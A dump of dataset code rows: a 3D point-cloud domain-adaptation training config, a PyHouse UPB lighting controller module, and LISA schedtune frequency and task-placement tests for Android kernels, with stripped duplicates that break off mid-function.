file_client_args = dict(backend='disk')
# Native camera resolution and the downscaled size fed to the network.
img_size = (1600, 900)
resize = (400, 225)
train_pipeline = [
    dict(
        type='LoadPointsFromFileVer2',  # new 'points', 'num_seg_pts'
        load_dim=5,
        use_dim=5),
    # dict(
    #     type='LoadMaskedMultiSweeps',  # modify 'points'; new 'num_seg_pts'
    #     sweeps_num=10,
    #     file_client_args=file_client_args),
    # dict(type='LoadAnnotations3D', with_bbox_3d=True, with_label_3d=True),  # new 'gt_bboxes_3d', 'gt_labels_3d'
    dict(type='LoadImgSegLabel', resize=resize),  # new 'img'(PIL.Image), 'seg_label'
    dict(type='PointsSensorFilterVer2', img_size=img_size, resize=resize),
    # filter 'points'; new 'pts_indices'; modify 'num_seg_pts', 'seg_label'
    dict(type='Aug2D', fliplr=0.5, color_jitter=(0.4, 0.4, 0.4)),
    # fliplr & color jitter; 'img': PIL.Image to np.array; update 'seg_pts_indices', 'pts_indices' accordingly;
    dict(type='XmudaAug3D', scale=scn_scale, full_scale=scn_full_scale,
         noisy_rot=0.1, flip_x=0.5, flip_y=0.5, rot_z=6.2831, transl=True),  # new 'scn_coords'
    # dict(
    #     type='GlobalRotScaleTrans',
    #     rot_range=[-0.7854, 0.7854],
    #     scale_ratio_range=[0.9, 1.1],
    #     translation_std=[0.2, 0.2, 0.2]),  # 3D Rot, Scale, Trans for 'points'
    # dict(
    #     type='RandomFlip3D',
    #     # flip_ratio_bev_horizontal=0.5,
    #     flip_ratio_bev_vertical=0.5),  # do nothing; to read further
    # dict(type='PointsRangeFilterVer2', point_cloud_range=point_cloud_range),
    # # filter 'points', 'pts_indices', 'seg_label'; new 'seg_points', 'seg_pts_indices'
    dict(type='GetSegFromPoints'),  # new 'seg_points', 'seg_pts_indices'
    # dict(type='ObjectRangeFilter', point_cloud_range=point_cloud_range),
    # dict(type='DetLabelFilter'),  # Filter labels == -1; not in TEN_CLASSES
    # dict(type='PointShuffle'),  # shuffle 'points', 'pts_indices'; make sure no index op after shuffle
    dict(type='MergeCat'),  # merge 'seg_label'
    dict(type='SegDetFormatBundle'),
    dict(type='Collect3D', keys=['img', 'seg_points', 'seg_pts_indices', 'seg_label', 'scn_coords'])
]
# Same as train_pipeline but with augmentations (Aug2D jitter, XmudaAug3D
# rot/flip/translate) disabled.
test_pipeline = [
    dict(
        type='LoadPointsFromFileVer2',
        load_dim=5,
        use_dim=5),
    # dict(
    #     type='LoadMaskedMultiSweeps',
    #     sweeps_num=10,
    #     file_client_args=file_client_args),
    dict(type='LoadImgSegLabel', resize=resize),  # new 'img'(PIL.Image), 'seg_label'
    dict(type='PointsSensorFilterVer2', img_size=img_size, resize=resize),
    # filter 'points'; new 'pts_indices'; modify 'num_seg_pts', 'seg_label'
    dict(type='Aug2D'),  # No Aug2D in test; just PIL.Image to np.ndarray
    dict(type='XmudaAug3D', scale=scn_scale, full_scale=scn_full_scale),  # new 'scn_coords'; no aug3d in test
    dict(type='GetSegFromPoints'),  # new 'seg_points', 'seg_pts_indices'
    dict(type='MergeCat'),  # merge 'seg_label'
    dict(type='SegDetFormatBundle'),
    dict(type='Collect3D', keys=['img', 'seg_points', 'seg_pts_indices', 'seg_label', 'scn_coords'])
    # dict(
    #     type='MultiScaleFlipAug3D',
    #     img_scale=(1333, 800),
    #     pts_scale_ratio=1,
    #     flip=False,
    #     transforms=[
    #         # dict(type='PointsRangeFilterVer2', point_cloud_range=point_cloud_range),
    #         dict(type='MergeCat'),
    #         dict(type='SegDetFormatBundle'),
    #         dict(type='Collect3D', keys=['img', 'seg_points', 'seg_pts_indices', 'seg_label'])
    #     ])
]
# splits
source_train = 'mmda_xmuda_split/train_usa.pkl'
source_test = 'mmda_xmuda_split/test_usa.pkl'
target_train = 'mmda_xmuda_split/train_singapore.pkl'
target_test = 'mmda_xmuda_split/test_singapore.pkl'
target_val = 'mmda_xmuda_split/val_singapore.pkl'
# dataset
dataset_type = 'MMDAMergeCatDataset'
data = dict(
    samples_per_gpu=8,
    workers_per_gpu=4,
    # Source-domain (USA) training split, with augmentations.
    source_train=dict(
        type=dataset_type,
        data_root=data_root,
        ann_file=data_root + source_train,
        pipeline=train_pipeline,
        classes=class_names,
        modality=input_modality,
        test_mode=False,
        filter_empty_gt=False,
        box_type_3d='LiDAR'),
    # Target-domain (Singapore) training split, with augmentations.
    target_train=dict(
        type=dataset_type,
        data_root=data_root,
        ann_file=data_root + target_train,
        pipeline=train_pipeline,
        classes=class_names,
        modality=input_modality,
        test_mode=False,
        filter_empty_gt=False,
        box_type_3d='LiDAR'),
    source_test=dict(
        type=dataset_type,
        data_root=data_root,
        ann_file=data_root + source_test,
        pipeline=test_pipeline,
        classes=class_names,
        modality=input_modality,
        test_mode=True,
        box_type_3d='LiDAR'),
    target_test=dict(
        type=dataset_type,
        data_root=data_root,
        ann_file=data_root + target_test,
        pipeline=test_pipeline,
        classes=class_names,
        modality=input_modality,
        test_mode=True,
        box_type_3d='LiDAR'),
    target_val=dict(
        type=dataset_type,
        data_root=data_root,
        # Bug fix: this entry previously pointed at the *test* split
        # (data_root + target_test), leaving the val split path declared
        # above unused. Use the actual validation annotation file.
        ann_file=data_root + target_val,
        pipeline=test_pipeline,
        classes=class_names,
        modality=input_modality,
        test_mode=True,
        box_type_3d='LiDAR')
)
# Effectively disables periodic evaluation (interval far beyond total_epochs).
evaluation = dict(interval=100)
# shedule_2x.py
optimizer = dict(type='AdamW', lr=0.001, weight_decay=0.01)
# Step LR decay at lr_step (epochs 16 and 22) with a 1000-iteration
# linear warmup from lr/1000.
lr_config = dict(
    policy='step',
    warmup='linear',
    warmup_iters=1000,
    warmup_ratio=1.0 / 1000,
    step=lr_step)
optimizer_config = dict()
# optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
momentum_config = None
# default_runtime.py
checkpoint_config = dict(interval=1)
log_config = dict(
    interval=25,
    hooks=[
        dict(type='TextLoggerHook'),
        dict(type='TensorboardLoggerHook')
    ])
# yapf:enable
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = None
load_from = None
resume_from = None
workflow = [('train', 1)]
1c33329b62c08f717b74feb9b3ec27e82debf45c | 2,876 | py | Python | Project/src/Modules/House/Family/Upb/upb_device.py | DBrianKimmel/PyHouse | a100fc67761a22ae47ed6f21f3c9464e2de5d54f | [
"MIT"
] | 3 | 2016-11-16T00:37:58.000Z | 2019-11-10T13:10:19.000Z | Project/src/Modules/House/Family/Upb/upb_device.py | DBrianKimmel/PyHouse | a100fc67761a22ae47ed6f21f3c9464e2de5d54f | [
"MIT"
] | null | null | null | Project/src/Modules/House/Family/Upb/upb_device.py | DBrianKimmel/PyHouse | a100fc67761a22ae47ed6f21f3c9464e2de5d54f | [
"MIT"
] | 1 | 2020-07-19T22:06:52.000Z | 2020-07-19T22:06:52.000Z | """
@name: Modules/families/UPB/UPB_device.py
@author: D. Brian Kimmel
@contact: D.BrianKimmel@gmail.com
@copyright: (c) 2011-2020 by D. Brian Kimmel
@license: MIT License
@note: Created on Mar 27, 2011
@summary: This module is for communicating with UPB controllers.
Load the database with UPB devices.
Start Active UPB Controllers.
If more than one ???
"""
__updated__ = '2020-02-19'
# Import system type stuff
# Import PyMh files
from Modules.Families.UPB.UPB_Pim import Api as upbPimApi
from Modules.Core import logging_pyh as Logger
LOG = Logger.getLogger('PyHouse.UPB_device ')
class lightingUtility(object):
    """Helpers for identifying UPB lighting controllers."""

    @staticmethod
    def _is_upb_active(p_controller_obj):
        """Return True when the controller belongs to the UPB family.

        Bug fix: the previous implementation only returned False for
        non-UPB controllers and fell through (returning None) for UPB
        ones, so ``if _is_upb_active(...)`` was never true and no UPB
        controller could ever be started.
        """
        return p_controller_obj.Family.Name == 'UPB'
class Api(object):
    """Public interface for the UPB lighting family."""

    def __init__(self, p_pyhouse_obj):
        """Constructor for the UPB.
        """
        self.m_pyhouse_obj = p_pyhouse_obj

    def Start(self):
        """For the given house, this will start all the controllers for family = UPB in that house.
        """
        l_count = 0
        for l_controller_obj in self.m_pyhouse_obj.House.Lighting.Controllers.values():
            if not lightingUtility._is_upb_active(l_controller_obj):
                continue
            l_controller_prefix = 'house/lighting/controllers/{}'.format(l_controller_obj.Name)
            l_controller_obj._HandlerApi = upbPimApi(self.m_pyhouse_obj)
            if l_controller_obj._HandlerApi.Start(self.m_pyhouse_obj, l_controller_obj):
                LOG.info('Controller {} Started.'.format(l_controller_obj.Name))
                l_count += 1
                # Bug fix: l_controller_prefix already starts with
                # 'house/lighting/controllers/', so prepending that string
                # again produced a doubled topic path.
                l_topic = l_controller_prefix + '/start'
                self.m_pyhouse_obj.Core.MqttApi.MqttPublish(l_topic, l_controller_obj)  # /start
            else:
                LOG.error('Controller {} failed to start.'.format(l_controller_obj.Name))
                # l_controller_obj.Active = False
        LOG.info('Started {} UPB Controllers.'.format(l_count))

    def Stop(self):
        """Stop the handler of every active UPB controller."""
        try:
            for l_controller_obj in self.m_pyhouse_obj.House.Lighting.Controllers.values():
                if lightingUtility._is_upb_active(l_controller_obj):
                    l_controller_obj._HandlerApi.Stop(l_controller_obj)
        except AttributeError as e_err:
            LOG.error('Stop ERROR {}'.format(e_err))

    def SaveXml(self, p_xml):
        """
        Not needed since the xml is taken care as a part of the device.
        """
        return p_xml

    def Control(self, p_device_obj, p_controller_obj, p_control):
        """Change the state of a UPB device.

        Bug fix: the body referenced names that do not exist in this scope
        (p_light_obj, p_source, p_level), raising NameError on every call;
        it now uses the actual parameters.
        """
        LOG.debug('Change light Name:{}, Family.Name:{}'.format(
            p_device_obj.Name, p_device_obj.Family.Name))
        # NOTE(review): self.m_plm is never assigned anywhere in this class;
        # presumably set elsewhere -- confirm before relying on Control().
        self.m_plm.Control(p_device_obj, p_controller_obj, p_control)
# ## END
| 35.506173 | 107 | 0.650556 |
__updated__ = '2020-02-19'
from Modules.Families.UPB.UPB_Pim import Api as upbPimApi
from Modules.Core import logging_pyh as Logger
LOG = Logger.getLogger('PyHouse.UPB_device ')
class lightingUtility(object):
    """Helpers for identifying UPB lighting controllers."""

    @staticmethod
    def _is_upb_active(p_controller_obj):
        """Return True when the controller belongs to the UPB family.

        Bug fix: the previous implementation only returned False for
        non-UPB controllers and fell through (returning None) for UPB
        ones, so callers testing the result never started them.
        """
        return p_controller_obj.Family.Name == 'UPB'
class Api(object):
    """Public interface for the UPB lighting family."""

    def __init__(self, p_pyhouse_obj):
        """Constructor for the UPB."""
        self.m_pyhouse_obj = p_pyhouse_obj

    def Start(self):
        """Start every controller whose family is UPB."""
        l_count = 0
        for l_controller_obj in self.m_pyhouse_obj.House.Lighting.Controllers.values():
            if not lightingUtility._is_upb_active(l_controller_obj):
                continue
            l_controller_prefix = 'house/lighting/controllers/{}'.format(l_controller_obj.Name)
            l_controller_obj._HandlerApi = upbPimApi(self.m_pyhouse_obj)
            if l_controller_obj._HandlerApi.Start(self.m_pyhouse_obj, l_controller_obj):
                LOG.info('Controller {} Started.'.format(l_controller_obj.Name))
                l_count += 1
                # Bug fix: l_controller_prefix already starts with
                # 'house/lighting/controllers/', so prepending that string
                # again produced a doubled topic path.
                l_topic = l_controller_prefix + '/start'
                self.m_pyhouse_obj.Core.MqttApi.MqttPublish(l_topic, l_controller_obj)
            else:
                LOG.error('Controller {} failed to start.'.format(l_controller_obj.Name))
        LOG.info('Started {} UPB Controllers.'.format(l_count))

    def Stop(self):
        """Stop the handler of every active UPB controller."""
        try:
            for l_controller_obj in self.m_pyhouse_obj.House.Lighting.Controllers.values():
                if lightingUtility._is_upb_active(l_controller_obj):
                    l_controller_obj._HandlerApi.Stop(l_controller_obj)
        except AttributeError as e_err:
            LOG.error('Stop ERROR {}'.format(e_err))

    def SaveXml(self, p_xml):
        """Not needed since the xml is taken care of as a part of the device."""
        return p_xml

    def Control(self, p_device_obj, p_controller_obj, p_control):
        """Change the state of a UPB device.

        Bug fix: the body referenced names that do not exist in this scope
        (p_light_obj, p_source, p_level), raising NameError on every call;
        it now uses the actual parameters.
        """
        LOG.debug('Change light Name:{}, Family.Name:{}'.format(
            p_device_obj.Name, p_device_obj.Family.Name))
        # NOTE(review): self.m_plm is never assigned anywhere in this class;
        # presumably set elsewhere -- confirm before relying on Control().
        self.m_plm.Control(p_device_obj, p_controller_obj, p_control)
| true | true |
1c3332fce4b39830bc48b6785450db2bd6c00c52 | 11,547 | py | Python | lisa/tests/staging/sched_android.py | credp/lisa | c87a9a3463d55dd28ff7bb705551529a4ffd4456 | [
"Apache-2.0"
] | 1 | 2021-07-03T23:45:09.000Z | 2021-07-03T23:45:09.000Z | lisa/tests/staging/sched_android.py | QPC-database/lisa | 9cc520a11192dea02240ddcf0df53bf6d6763411 | [
"Apache-2.0"
] | null | null | null | lisa/tests/staging/sched_android.py | QPC-database/lisa | 9cc520a11192dea02240ddcf0df53bf6d6763411 | [
"Apache-2.0"
] | null | null | null | # SPDX-License-Identifier: Apache-2.0
#
# Copyright (C) 2019, Arm Limited and contributors.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import os.path
import abc
from lisa.wlgen.rta import RTAPhase, PeriodicWload
from lisa.tests.base import TestBundleBase, TestBundle, ResultBundle, RTATestBundle, AggregatedResultBundle
from lisa.trace import requires_events
from lisa.target import Target
from lisa.utils import ArtifactPath, kwargs_forwarded_to
from lisa.analysis.frequency import FrequencyAnalysis
from lisa.analysis.tasks import TasksAnalysis
class SchedTuneItemBase(RTATestBundle, TestBundle):
    """
    Abstract class enabling rtapp execution in a schedtune group
    :param boost: The boost level to set for the cgroup
    :type boost: int
    :param prefer_idle: The prefer_idle flag to set for the cgroup
    :type prefer_idle: bool
    """
    def __init__(self, res_dir, plat_info, boost, prefer_idle):
        super().__init__(res_dir, plat_info)
        self.boost = boost
        self.prefer_idle = prefer_idle
    @property
    def cgroup_configuration(self):
        """Schedtune cgroup description matching this item's boost/prefer_idle."""
        return self.get_cgroup_configuration(self.plat_info, self.boost, self.prefer_idle)
    @classmethod
    def get_cgroup_configuration(cls, plat_info, boost, prefer_idle):
        """
        Build the 'lisa_test' schedtune cgroup description.
        ``prefer_idle`` is stored as an int since the cgroup attribute is 0/1.
        """
        attributes = {
            'boost': boost,
            'prefer_idle': int(prefer_idle)
        }
        return {'name': 'lisa_test',
                'controller': 'schedtune',
                'attributes': attributes}
    @classmethod
    # Not annotated, to prevent exekall from picking it up. See
    # SchedTuneBase.from_target
    def _from_target(cls, target, *, res_dir, boost, prefer_idle, collector=None):
        """Run the rtapp profile inside the schedtune cgroup, then build the bundle."""
        plat_info = target.plat_info
        rtapp_profile = cls.get_rtapp_profile(plat_info)
        cgroup_config = cls.get_cgroup_configuration(plat_info, boost, prefer_idle)
        cls.run_rtapp(target, res_dir, rtapp_profile, collector=collector, cg_cfg=cgroup_config)
        return cls(res_dir, plat_info, boost, prefer_idle)
class SchedTuneBase(TestBundleBase):
    """
    Abstract class enabling the aggregation of ``SchedTuneItemBase``
    :param test_bundles: a list of test bundles generated by
        multiple ``SchedTuneItemBase`` instances
    :type test_bundles: list
    """
    def __init__(self, res_dir, plat_info, test_bundles):
        super().__init__(res_dir, plat_info)
        self.test_bundles = test_bundles
    @classmethod
    # Forward SchedTuneItemBase._from_target's keyword arguments, except
    # boost/prefer_idle which each subclass supplies per item.
    @kwargs_forwarded_to(
        SchedTuneItemBase._from_target,
        ignore=[
            'boost',
            'prefer_idle',
        ]
    )
    def _from_target(cls, target: Target, *, res_dir: ArtifactPath = None,
                     collector=None, **kwargs) -> 'SchedTuneBase':
        """
        Creates a SchedTuneBase bundle from the target.
        """
        return cls(res_dir, target.plat_info,
                   list(cls._create_test_bundles(target, res_dir, **kwargs))
                   )
    @classmethod
    @abc.abstractmethod
    def _create_test_bundles(cls, target, res_dir, **kwargs):
        """
        Collects and yields a :class:`lisa.tests.base.ResultBundle` per test
        item.
        """
        pass
    @classmethod
    def _create_test_bundle_item(cls, target, res_dir, item_cls,
                                 boost, prefer_idle, **kwargs):
        """
        Creates and returns a TestBundle for a given item class, and a given
        schedtune configuration
        """
        # Each (boost, prefer_idle) combination gets its own artifact subdir.
        item_dir = ArtifactPath.join(res_dir, f'boost_{boost}_prefer_idle_{int(prefer_idle)}')
        os.makedirs(item_dir)
        logger = cls.get_logger()
        logger.info(f'Running {item_cls.__name__} with boost={boost}, prefer_idle={prefer_idle}')
        return item_cls.from_target(target,
                                    boost=boost,
                                    prefer_idle=prefer_idle,
                                    res_dir=item_dir,
                                    **kwargs,
                                    )
class SchedTuneFreqItem(SchedTuneItemBase):
    """
    Runs a tiny RT rtapp task pinned to a big CPU at a given boost level and
    checks the frequency selection was performed accordingly.
    """
    @classmethod
    def _get_rtapp_profile(cls, plat_info):
        # First CPU of the highest-capacity class (a "big" CPU).
        cpu = plat_info['capacity-classes'][-1][0]
        return {
            'stune': RTAPhase(
                prop_wload=PeriodicWload(
                    # very small task, no impact on freq w/o boost
                    duty_cycle_pct=1,
                    duration=10,
                    period=cls.TASK_PERIOD,
                ),
                # pin to big CPU, to focus on frequency selection
                prop_cpus=[cpu],
                # RT tasks have the boost holding feature so the frequency
                # should be more stable, and we shouldn't go to max freq in
                # Android
                prop_policy='SCHED_FIFO'
            )
        }
    @FrequencyAnalysis.df_cpu_frequency.used_events
    @requires_events(SchedTuneItemBase.trace_window.used_events, "cpu_frequency")
    def trace_window(self, trace):
        """
        Set the boundaries of the trace window to ``cpu_frequency`` events
        before/after the task's start/end time
        """
        rta_start, rta_stop = super().trace_window(trace)
        cpu = self.plat_info['capacity-classes'][-1][0]
        freq_df = trace.analysis.frequency.df_cpu_frequency(cpu)
        # Find the frequency events before and after the task runs
        # NOTE(review): raises IndexError if no cpu_frequency event exists
        # before rta_start (or after rta_stop) -- confirm traces always
        # capture one.
        freq_start = freq_df[freq_df.index < rta_start].index[-1]
        freq_stop = freq_df[freq_df.index > rta_stop].index[0]
        return (freq_start, freq_stop)
    @FrequencyAnalysis.get_average_cpu_frequency.used_events
    def test_stune_frequency(self, freq_margin_pct=10) -> ResultBundle:
        """
        Test that frequency selection followed the boost
        :param: freq_margin_pct: Allowed margin between estimated and measured
            average frequencies
        :type freq_margin_pct: int
        Compute the expected frequency given the boost level and compare to the
        real average frequency from the trace.
        Check that the difference between expected and measured frequencies is
        no larger than ``freq_margin_pct``.
        """
        kernel_version = self.plat_info['kernel']['version']
        if kernel_version.parts[:2] < (4, 14):
            self.get_logger().warning(f'This test requires the RT boost hold, but it may be disabled in {kernel_version}')
        cpu = self.plat_info['capacity-classes'][-1][0]
        freqs = self.plat_info['freqs'][cpu]
        max_freq = max(freqs)
        # Estimate the target frequency, including sugov's margin, and round
        # into a real OPP
        boost = self.boost
        # boost / 80 == (boost / 100) * 1.25, i.e. the boost percentage
        # inflated by the governor's 25% headroom.
        target_freq = min(max_freq, max_freq * boost / 80)
        # Picks the first OPP >= target in list order; assumes ``freqs`` is
        # sorted ascending -- TODO confirm.
        target_freq = list(filter(lambda f: f >= target_freq, freqs))[0]
        # Get the real average frequency
        avg_freq = self.trace.analysis.frequency.get_average_cpu_frequency(cpu)
        distance = abs(target_freq - avg_freq) * 100 / target_freq
        res = ResultBundle.from_bool(distance < freq_margin_pct)
        res.add_metric("target freq", target_freq, 'kHz')
        res.add_metric("average freq", avg_freq, 'kHz')
        res.add_metric("boost", boost, '%')
        return res
class SchedTuneFrequencyTest(SchedTuneBase):
    """
    Run ``SchedTuneFreqItem`` at boost levels 20, 40, 60, 80 and 100 percent,
    then aggregate the per-boost results.
    """
    @classmethod
    def _create_test_bundles(cls, target, res_dir, **kwargs):
        boost_levels = (20, 40, 60, 80, 100)
        for boost_pct in boost_levels:
            yield cls._create_test_bundle_item(
                target=target,
                res_dir=res_dir,
                item_cls=SchedTuneFreqItem,
                boost=boost_pct,
                prefer_idle=False,
                **kwargs
            )
    def test_stune_frequency(self, freq_margin_pct=10) -> AggregatedResultBundle:
        """
        .. seealso:: :meth:`SchedTuneFreqItem.test_stune_frequency`
        """
        per_item_results = []
        for bundle in self.test_bundles:
            per_item_results.append(bundle.test_stune_frequency(freq_margin_pct))
        return AggregatedResultBundle(per_item_results, 'boost')
class SchedTunePlacementItem(SchedTuneItemBase):
    """
    Runs a tiny RT-App task marked 'prefer_idle' at a given boost level and
    tests if it was placed on big-enough CPUs.
    """
    @classmethod
    def _get_rtapp_profile(cls, plat_info):
        # A single very light periodic task; placement is what matters here.
        workload = PeriodicWload(
            duty_cycle_pct=1,
            duration=3,
            period=cls.TASK_PERIOD,
        )
        return {'stune': RTAPhase(prop_wload=workload)}
    @TasksAnalysis.df_task_total_residency.used_events
    def test_stune_task_placement(self, bad_cpu_margin_pct=10) -> ResultBundle:
        """
        Test that the task placement satisfied the boost requirement
        Check that top-app tasks spend no more than ``bad_cpu_margin_pct`` of
        their time on CPUs that don't have enough capacity to serve their
        boost.
        """
        assert len(self.rtapp_tasks) == 1
        residency_df = self.trace.analysis.tasks.df_task_total_residency(
            self.rtapp_tasks[0])
        boost = self.boost
        cpu_caps = self.plat_info['cpu-capacities']['rtapp']
        # CPUs whose capacity (rescaled from the 1024 scale to percent)
        # cannot serve the requested boost.
        slow_cpus = {
            cpu for cpu in cpu_caps if cpu_caps[cpu] / 10.24 < boost
        }
        runtimes = residency_df['runtime']
        total_time = sum(runtimes[cpu] for cpu in cpu_caps)
        time_ko = sum(runtimes[cpu] for cpu in cpu_caps if cpu in slow_cpus)
        pct_ko = time_ko * 100 / total_time
        res = ResultBundle.from_bool(pct_ko < bad_cpu_margin_pct)
        res.add_metric("time spent on inappropriate CPUs", pct_ko, '%')
        res.add_metric("boost", boost, '%')
        return res
class SchedTunePlacementTest(SchedTuneBase):
    """
    Run ``SchedTunePlacementItem`` with prefer_idle set at the boost levels
    Android typically applies to top-app tasks, then aggregate the results.
    """
    @classmethod
    def _create_test_bundles(cls, target, res_dir, **kwargs):
        # 10% is the usual top-app boost, 50% the touchboost level.
        for boost_pct in (10, 50):
            yield cls._create_test_bundle_item(
                target=target,
                res_dir=res_dir,
                item_cls=SchedTunePlacementItem,
                boost=boost_pct,
                prefer_idle=True,
                **kwargs
            )
    def test_stune_task_placement(self, margin_pct=10) -> AggregatedResultBundle:
        """
        .. seealso:: :meth:`SchedTunePlacementItem.test_stune_task_placement`
        """
        per_item_results = []
        for bundle in self.test_bundles:
            per_item_results.append(bundle.test_stune_task_placement(margin_pct))
        return AggregatedResultBundle(per_item_results, 'boost')
# vim :set tabstop=4 shiftwidth=4 textwidth=80 expandtab
| 35.097264 | 122 | 0.639993 |
import os
import os.path
import abc
from lisa.wlgen.rta import RTAPhase, PeriodicWload
from lisa.tests.base import TestBundleBase, TestBundle, ResultBundle, RTATestBundle, AggregatedResultBundle
from lisa.trace import requires_events
from lisa.target import Target
from lisa.utils import ArtifactPath, kwargs_forwarded_to
from lisa.analysis.frequency import FrequencyAnalysis
from lisa.analysis.tasks import TasksAnalysis
# Comment-stripped duplicate of SchedTuneItemBase (dataset 'content_no_comment'
# column); the fully documented version appears earlier in this file.
class SchedTuneItemBase(RTATestBundle, TestBundle):
    """Run rtapp inside a schedtune cgroup with a given boost/prefer_idle."""
    def __init__(self, res_dir, plat_info, boost, prefer_idle):
        super().__init__(res_dir, plat_info)
        self.boost = boost
        self.prefer_idle = prefer_idle
    @property
    def cgroup_configuration(self):
        return self.get_cgroup_configuration(self.plat_info, self.boost, self.prefer_idle)
    @classmethod
    def get_cgroup_configuration(cls, plat_info, boost, prefer_idle):
        # Build the 'lisa_test' schedtune cgroup description.
        attributes = {
            'boost': boost,
            'prefer_idle': int(prefer_idle)
        }
        return {'name': 'lisa_test',
                'controller': 'schedtune',
                'attributes': attributes}
    @classmethod
    def _from_target(cls, target, *, res_dir, boost, prefer_idle, collector=None):
        # Run the rtapp profile inside the schedtune cgroup, then build the bundle.
        plat_info = target.plat_info
        rtapp_profile = cls.get_rtapp_profile(plat_info)
        cgroup_config = cls.get_cgroup_configuration(plat_info, boost, prefer_idle)
        cls.run_rtapp(target, res_dir, rtapp_profile, collector=collector, cg_cfg=cgroup_config)
        return cls(res_dir, plat_info, boost, prefer_idle)
# Comment-stripped duplicate of SchedTuneBase (dataset 'content_no_comment'
# column); the fully documented version appears earlier in this file.
class SchedTuneBase(TestBundleBase):
    """Aggregate multiple SchedTuneItemBase bundles."""
    def __init__(self, res_dir, plat_info, test_bundles):
        super().__init__(res_dir, plat_info)
        self.test_bundles = test_bundles
    @classmethod
    @kwargs_forwarded_to(
        SchedTuneItemBase._from_target,
        ignore=[
            'boost',
            'prefer_idle',
        ]
    )
    def _from_target(cls, target: Target, *, res_dir: ArtifactPath = None,
                     collector=None, **kwargs) -> 'SchedTuneBase':
        return cls(res_dir, target.plat_info,
                   list(cls._create_test_bundles(target, res_dir, **kwargs))
                   )
    @classmethod
    @abc.abstractmethod
    def _create_test_bundles(cls, target, res_dir, **kwargs):
        # Subclasses yield one bundle per schedtune configuration.
        pass
    @classmethod
    def _create_test_bundle_item(cls, target, res_dir, item_cls,
                                 boost, prefer_idle, **kwargs):
        # Each (boost, prefer_idle) combination gets its own artifact subdir.
        item_dir = ArtifactPath.join(res_dir, f'boost_{boost}_prefer_idle_{int(prefer_idle)}')
        os.makedirs(item_dir)
        logger = cls.get_logger()
        logger.info(f'Running {item_cls.__name__} with boost={boost}, prefer_idle={prefer_idle}')
        return item_cls.from_target(target,
                                    boost=boost,
                                    prefer_idle=prefer_idle,
                                    res_dir=item_dir,
                                    **kwargs,
                                    )
# Comment-stripped duplicate of SchedTuneFreqItem (dataset 'content_no_comment'
# column); the fully documented version appears earlier in this file.
class SchedTuneFreqItem(SchedTuneItemBase):
    """Tiny RT task pinned to a big CPU; checks frequency follows the boost."""
    @classmethod
    def _get_rtapp_profile(cls, plat_info):
        cpu = plat_info['capacity-classes'][-1][0]
        return {
            'stune': RTAPhase(
                prop_wload=PeriodicWload(
                    duty_cycle_pct=1,
                    duration=10,
                    period=cls.TASK_PERIOD,
                ),
                # Pin to a big CPU; SCHED_FIFO so RT boost-holding keeps the
                # frequency stable.
                prop_cpus=[cpu],
                prop_policy='SCHED_FIFO'
            )
        }
    @FrequencyAnalysis.df_cpu_frequency.used_events
    @requires_events(SchedTuneItemBase.trace_window.used_events, "cpu_frequency")
    def trace_window(self, trace):
        rta_start, rta_stop = super().trace_window(trace)
        cpu = self.plat_info['capacity-classes'][-1][0]
        freq_df = trace.analysis.frequency.df_cpu_frequency(cpu)
        # Find the frequency events before and after the task runs
        freq_start = freq_df[freq_df.index < rta_start].index[-1]
        freq_stop = freq_df[freq_df.index > rta_stop].index[0]
        return (freq_start, freq_stop)
    @FrequencyAnalysis.get_average_cpu_frequency.used_events
    def test_stune_frequency(self, freq_margin_pct=10) -> ResultBundle:
        kernel_version = self.plat_info['kernel']['version']
        if kernel_version.parts[:2] < (4, 14):
            self.get_logger().warning(f'This test requires the RT boost hold, but it may be disabled in {kernel_version}')
        cpu = self.plat_info['capacity-classes'][-1][0]
        freqs = self.plat_info['freqs'][cpu]
        max_freq = max(freqs)
        # Estimate the target frequency, including sugov's margin, and round
        # to a supported OPP (boost / 80 == boost% * 1.25 headroom).
        boost = self.boost
        target_freq = min(max_freq, max_freq * boost / 80)
        target_freq = list(filter(lambda f: f >= target_freq, freqs))[0]
        avg_freq = self.trace.analysis.frequency.get_average_cpu_frequency(cpu)
        distance = abs(target_freq - avg_freq) * 100 / target_freq
        res = ResultBundle.from_bool(distance < freq_margin_pct)
        res.add_metric("target freq", target_freq, 'kHz')
        res.add_metric("average freq", avg_freq, 'kHz')
        res.add_metric("boost", boost, '%')
        return res
# Comment-stripped duplicate of SchedTuneFrequencyTest (dataset
# 'content_no_comment' column); the documented version appears earlier.
class SchedTuneFrequencyTest(SchedTuneBase):
    """Run SchedTuneFreqItem at boost levels 20..100% and aggregate."""
    @classmethod
    def _create_test_bundles(cls, target, res_dir, **kwargs):
        for boost in range(20, 101, 20):
            yield cls._create_test_bundle_item(
                target=target,
                res_dir=res_dir,
                item_cls=SchedTuneFreqItem,
                boost=boost,
                prefer_idle=False,
                **kwargs
            )
    def test_stune_frequency(self, freq_margin_pct=10) -> AggregatedResultBundle:
        item_res_bundles = [
            item.test_stune_frequency(freq_margin_pct)
            for item in self.test_bundles
        ]
        return AggregatedResultBundle(item_res_bundles, 'boost')
# Comment-stripped duplicate of SchedTunePlacementItem (dataset
# 'content_no_comment' column); the documented version appears earlier.
class SchedTunePlacementItem(SchedTuneItemBase):
    """Tiny boosted task; checks it ran on CPUs with enough capacity."""
    @classmethod
    def _get_rtapp_profile(cls, plat_info):
        return {
            'stune': RTAPhase(
                prop_wload=PeriodicWload(
                    duty_cycle_pct=1,
                    duration=3,
                    period=cls.TASK_PERIOD,
                )
            )
        }
    @TasksAnalysis.df_task_total_residency.used_events
    def test_stune_task_placement(self, bad_cpu_margin_pct=10) -> ResultBundle:
        assert len(self.rtapp_tasks) == 1
        task = self.rtapp_tasks[0]
        df = self.trace.analysis.tasks.df_task_total_residency(task)
        boost = self.boost
        cpu_caps = self.plat_info['cpu-capacities']['rtapp']
        # CPUs whose capacity (1024 scale, rescaled to percent via /10.24)
        # cannot serve the requested boost.
        ko_cpus = list(filter(lambda x: (cpu_caps[x] / 10.24) < boost, cpu_caps))
        # Sum the residency on under-capacity CPUs vs. the total.
        time_ko = 0
        total_time = 0
        for cpu in cpu_caps:
            t = df['runtime'][cpu]
